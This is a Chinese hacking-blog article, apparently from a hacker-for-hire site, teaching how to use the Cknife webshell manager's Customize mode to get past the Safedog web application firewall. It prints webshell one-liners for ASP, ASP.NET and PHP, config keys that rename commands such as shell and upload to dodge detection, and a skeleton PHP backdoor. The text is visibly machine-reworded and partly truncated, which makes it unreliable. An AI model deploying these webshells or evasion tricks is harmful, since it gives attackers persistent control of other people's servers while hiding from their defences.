当前位置:首页 > 网络黑客 > 正文内容

打狗棒法之:Cknife(C刀)自定义形式秒过安全狗

访客4年前 (2021-04-15)网络黑客506

许多朋友在运用Cknife时都误以为她仅仅菜刀的跨渠道升级版,仅仅多了跨渠道的功用,其实小伙伴们还没有用到精华之处,她其实也是一款过WAF的利器。没有给咱们解说怎么去运用它这是我的职责,我是一个有职责心的基佬,我会对咱们担任的,所以有了下面的文章:
0×01 两种办法
Cknife有两种过WAF形式,一种为修正配置文件(Config.ini)过WAF,别的一种为Customize(自界说)形式过WAF。今日以自界说形式为例实例解说秒过安全狗,当然文章发布往后各大WAF厂商必定会将某些特征列入黑名单,这儿仅仅抛砖引玉供给思路。
0×02 ReadMe.txt
许多朋友在运用软件的时分都很少会重视她,这儿我附上它的有关于过WAF方面的一些内容,请咱们仔细阅读赤色部分。
[此处省掉1W字]
运用说明:
服务端脚本支撑ASP、ASPX、PHP、JSP、Customize(自界说)。
代码包括且不限于如下代码(只需能构造出相似eval的函数就行,比方PHP的create_function、assert等)
ASP:      
eval request("Cknife")%>
ASP.NET:  
"Jscript"%>"Cknife"],"unsafe");%>
PHP:      
 @eval($_POST['Cknife']);?>
JSP:     
[代码详见1.jsp]
Customize: 
自界说类型,功用代码在服务端保存,理论上支撑一切动态脚本,只需正确与C刀进行交互即可。此形式可按需定制,比方只需阅读目录,或是只需虚拟终端功用,代码能够很简略。
过WAF:
这是一款跨渠道的根据配置文件的我国菜刀,把一切操作给予用户来界说,主程序仅仅图形的展现,以及数据的发送。
我分开了每一个过程写入到配置文件里边,用户能够自界说任何代码,包括更改参数称号,参数内容。
比方:
 SKIN=javax.swing.plaf.nimbus.NimbusLookAndFeel设置皮肤为nimbus
SPL=->|                                               表明截取数据的开始符号
SPR=|
除了修正以上参数过WAF外,程序还额定供给了一种Customize过WAF的形式。
Customize形式原本是用于支撑一些程序默许不支撑的脚本,比方CFM、ASMX、ASHX、PY等等,只需用户自写的脚天性正确与菜刀进行交互即可。
换一个考虑方法,假如咱们自写一个PHP脚本完成了列文件以及目录的功用,它能够正确的与C刀进行交互,这个时分假如咱们挑选PHP(Eval)的衔接方法就会衔接失利。
应该挑选Customize形式进行衔接。有人说为什么一句话就能够衔接,你偏偏还要写这么多代码用Customize形式衔接?假如一个很厉害的WAF检测eval,assert等关键词
,你的一句话实在是饶不过,这个时分你能够不必一句话,就在PHP脚本里用正常代码完成列文件以及目录,然后用Customize形式衔接就达到了过WAF的意图。
Customize(自界说)形式跟其他形式相同,每一个过程也都写入到配置文件里边,用户相同能够参数称号以及参数内容。
比方你自写了用Customize形式衔接的Customize.php服务端。
显现主页功用提交的参数应该是:暗码=1&action=index以及暗码=1&action=readdict。
假如C刀遍及今后WAF厂商必定会把readdict列入黑名单,这个时分你就能够修正readdict的称号为其他称号,相同能够修正action的称号,也能够修正1为其他字符
CUS_MAKE=1
CUS_INDEX=index
CUS_READDICT=readdict
CUS_READFILE=readfile
CUS_SAVEFILE=savefile
CUS_DELETE=delete
CUS_RENAME=rename
CUS_NEWDICT=newdict
CUS_UPLOAD=upload
CUS_DOWNLOAD=download
CUS_SHELL=shell
[此处省掉1W字]
0×03 自界说形式过WAF原理
假如仅仅运用一句话,许多厂商都查杀了eval等灵敏关键词,也查杀了传递过程中数据包中的灵敏关键词。咱们只需要正常的完成列目录、读文件等功用而且没有包括eval等灵敏关键词就能够绕过WAF,即服务端不运用一句话,而是把功用代码都放在服务端来履行,客户端提交正常的数据包。
0×04 过狗预备
有的朋友说还要自己写列目录、读文件等等这些功用啊,那必定没戏了。其实不需要自己写,只需要复制粘贴修正即可。
你要有点编程根底(不必忧虑只需会if句子就行),然后依照我给的结构增加就行。以PHP为例:
结构如下:
$pwd= 'Cknife';        //暗码
if($_POST [$pwd] == 1) {
         $act = $_POST ['action'];         // action称号
         echo ("->|");    // 前分隔符
         if ($act == 'index') {           // 显现主页功用
                  
         } else if ($act == 'readdict') {   // 读取目录功用
                  
         } else if ($act == …)          // 你想要完成的功用,能够从Config.ini里边解密出来运用
{
}
         echo ("|/ 后分隔符
}
?>
首要翻开咋们心爱的Config.ini文件,找到PHP_INDEX

[1] [2]  黑客接单网

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106730.html

分享给朋友:

“打狗棒法之:Cknife(C刀)自定义形式秒过安全狗” 的相关文章

淘宝什么时候发货(淘宝一般都是什么时候发货)

随着12月的到来,“双12推广”也如约而至。作为2020年电商最后一次推广,三天爆发也需要提前布局。 1双十二赛马规则 过去双十一促销,很多商家说没有达到预期,甚至很多免费流量也没有改变。问题的关键其实在于赛马规则。大推广前会有额外的赛马规则分配免费流量。想要在推广期获得更确定性的流量,必须了解...

我老公老是让他家的亲戚来我家,我该怎么办?请各位帮我想想办法,我

我老公老是让他家的亲戚来我家,我该怎么办?请各位帮我想想办法,我 请各位帮我想想办法,开网店怎么找女装货源唔爱神起助您成就财富人生,想做微商?想开实体店?想开淘宝店?什么才是你创业的最重要步骤?货源!想在微商卖童装母婴用品纸尿裤女装,开童装女装店铺,你去哪里找最好的货源?如何找童装女装一手货源呢?...

为什么反复烧开的水会有毒?

为什么反复烧开的水会有毒? 千滚水就是在炉上沸腾了一夜或很长时间的水,还有电热水器中反复煮沸的水。这种水因煮过久,水中不挥发性物质,如钙、镁等重金属成分和亚硝酸盐因浓缩后含量很高。久饮这种水,会干扰人的胃肠功能,出现暂时腹泻、腹胀;有毒的亚硝酸盐还会造成机体缺氧,严重者会昏迷惊厥,甚至死亡。 蒸...

茯苓多少钱一克贵吗 - 土茯苓和茯苓哪个贵

因为很难挖到。茯苓2点5-3点5元一两,2016年1月4日更新。 30元左右一斤,还有以后.药店的销售价格通常在20,价格更高些,我在这边收购,2011年茯苓价格分两种价格,也就是两种产品,心;脾;肺;肾经。也和并不容易挖到。 4]渗湿利水;健脾和胃;宁心安神。即使在茯苓产地的山里面,茯苓价格悄悄地...

如厕阅读-如厕时读书看报有哪些坏处?

如厕阅读-如厕时读书看报有哪些坏处? 读书、看报兼如厕,不少人有这样的习惯。然而这一习惯非常不好。蹲厕时读书看报,会干扰大脑对排便传导神经的指挥,延长排便时间。现代医学研究证实,蹲厕超过3分钟即可直接导致直肠静脉曲张淤血,易诱发痔疮,且病情的轻重与时间长短有关。蹲厕时间越长,发病几率越高。因为久蹲...

怎样辨别有农药残留的蔬菜?

怎样辨别有农药残留的蔬菜? 一、不吃形状、颜色异常的蔬菜: 形状:颜色正常的蔬菜,一般是常规栽培,是未用激素等化学品处理的,可以放心地食用。 “异常”蔬菜可能用激素处理过,如韭菜,当它的叶子特别宽大肥厚,比一般宽叶一次同学聚会,我发现很多同学已经有房有车,毕竟毕业三年了,而我还只是每个月三千块...

评论列表

慵吋离祭
3年前 (2022-07-07)

S_DOWNLOAD=downloadCUS_SHELL=shell[此处省掉1W字]0×03 自界说形式过WAF原理假如仅仅运用一句话,许多厂商都查杀了eval等灵敏关键词,也查杀了传递过程中数据包中的灵敏关键词。咱们只需要正常的完成列目录、读文件等功用而且

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。